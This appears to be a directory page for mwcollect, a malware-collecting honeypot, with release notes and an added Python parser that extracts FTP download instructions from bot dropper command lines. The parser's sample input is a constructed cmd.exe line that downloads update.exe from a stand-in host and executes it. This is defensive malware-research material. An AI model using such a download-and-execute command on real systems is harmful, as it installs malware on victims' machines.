mwcollect is an easy way to collect worm-like malware on a non-native host such as FreeBSD or Linux: it listens on the ports the malware attacks, emulates the vulnerable service there (one or more vulnerability modules per port), decodes the shellcode it receives and downloads the binary the shellcode was meant to fetch. The first versions were used to collect binaries for botnet monitoring, and bots are still what it mostly collects. Some people consider it a next-generation honeypot; however, that comparison often leads to the misunderstanding that computers running mwcollect can actually be infected by the malware, which is not the case, since nothing captured is ever executed.
| Tags | Networking, Monitoring |
|---|---|
| Licenses | BSD (original) |
| Operating Systems | POSIX, BSD, FreeBSD, Linux, Windows, Windows (Cygwin) |
| Implementation | C, C++ |
Recent releases

Release Notes: This release adds a submit-gotek submission module, fixes some bugs in the timeout code, and builds cleanly under FreeBSD.

Release Notes: A vuln-ms0551 module (tcp/1025 MSDTC action; Dasher.A-C) was added. Shell parsing was improved. Fixes were made regarding startup file permissions. Various bugfixes were made. Other changes were made.

Release Notes: This release fixes some minor bugs, adds two shellcode parsers and a new parsing engine for FTP instruction files, and, most importantly, introduces approved Prelude IDS compatibility to mwcollect.

Release Notes: This version is a complete rewrite from scratch. The network core now supports multiple (vulnerability) modules per port and is much more mature and stable in general. This release is the step from a proof-of-concept toy to a real, mature project.

Release Notes: Some minor usage bugs were fixed. A major DoS security bug in PCRE usage was fixed.
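The release notes above mention a parsing engine for "FTP instruction files". Bot shellcode of that era commonly does not carry the binary itself: it hands cmd.exe a command line that writes an ftp.exe script with repeated `echo ... >> file` commands, runs it with `ftp -n -s:file`, and then executes the downloaded file. A collector that wants the binary without ever running anything has to recover that script and pull the file itself. The following is an added example of such a parser, written for this page; it is not mwcollect's own code and makes no claim about how mwcollect implements the feature. The command line in `SAMPLE_CMDLINE` is constructed for the example, and the subset of ftp.exe script verbs handled (`open`, `user`, `get`/`mget`) is an assumption about what dropper scripts actually use.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the command line a bot's shellcode typically hands to
# cmd.exe on the victim. It writes an FTP script line by line with "echo",
# runs it with "ftp -n -s:<file>", then executes the fetched binary.
SAMPLE_CMDLINE = (
    "cmd /c echo open 192.0.2.10 21 > i&echo user bot bot >> i&"
    "echo binary >> i&echo get update.exe >> i&echo quit >> i&"
    "ftp -n -s:i&update.exe"
)


@dataclass
class FtpInstructions:
    """What a collector needs in order to fetch the dropped binary itself."""
    host: str
    port: int = 21
    user: str = "anonymous"
    password: str = ""
    files: List[str] = field(default_factory=list)


# "echo <text> > file" / "echo <text> >> file"; cmd.exe does not require
# whitespace around the redirection operator, so "echo bin>>i" must match too.
ECHO_RE = re.compile(r"echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)", re.IGNORECASE)
# "ftp ... -s:<file>" makes ftp.exe read its commands from <file>.
FTP_RE = re.compile(r"\bftp\b[^&]*?-s:(?P<file>\S+)", re.IGNORECASE)


def split_commands(cmdline: str) -> List[str]:
    """cmd.exe chains commands with & (and &&)."""
    return [c.strip() for c in re.split(r"&&?", cmdline) if c.strip()]


def collect_script_files(cmdline: str) -> Dict[str, List[str]]:
    """Rebuild every file the command line writes through echo redirection."""
    files: Dict[str, List[str]] = {}
    for cmd in split_commands(cmdline):
        m = ECHO_RE.search(cmd)
        if m:
            files.setdefault(m.group("file"), []).append(m.group("text"))
    return files


def parse_ftp_script(lines: List[str]) -> Optional[FtpInstructions]:
    """Interpret the subset of ftp.exe script verbs dropper scripts use."""
    instr: Optional[FtpInstructions] = None
    expect_password = False
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            port = int(parts[2]) if len(parts) >= 3 and parts[2].isdigit() else 21
            instr = FtpInstructions(host=parts[1], port=port)
        elif instr is None:
            continue                      # nothing before "open" is meaningful
        elif expect_password:
            instr.password = parts[0]     # password supplied on its own line
            expect_password = False
        elif verb == "user":
            if len(parts) >= 2:
                instr.user = parts[1]
            if len(parts) >= 3:
                instr.password = parts[2]
            else:
                expect_password = True
        elif verb in ("get", "mget"):
            instr.files.extend(parts[1:])
        # binary/bin/quit/bye carry nothing the collector needs
    return instr


def extract_download_instructions(cmdline: str) -> Optional[FtpInstructions]:
    """Find the ftp -s: invocation and parse the script file it refers to."""
    files = collect_script_files(cmdline)
    for cmd in split_commands(cmdline):
        m = FTP_RE.search(cmd)
        if m and m.group("file") in files:
            return parse_ftp_script(files[m.group("file")])
    return None


if __name__ == "__main__":
    print(extract_download_instructions(SAMPLE_CMDLINE))
```

The collector then opens its own FTP connection with the recovered host, port and credentials and retrieves the listed files into its sample store; at no point is the captured command line or the downloaded binary executed, which is the property the first paragraph of this page stresses.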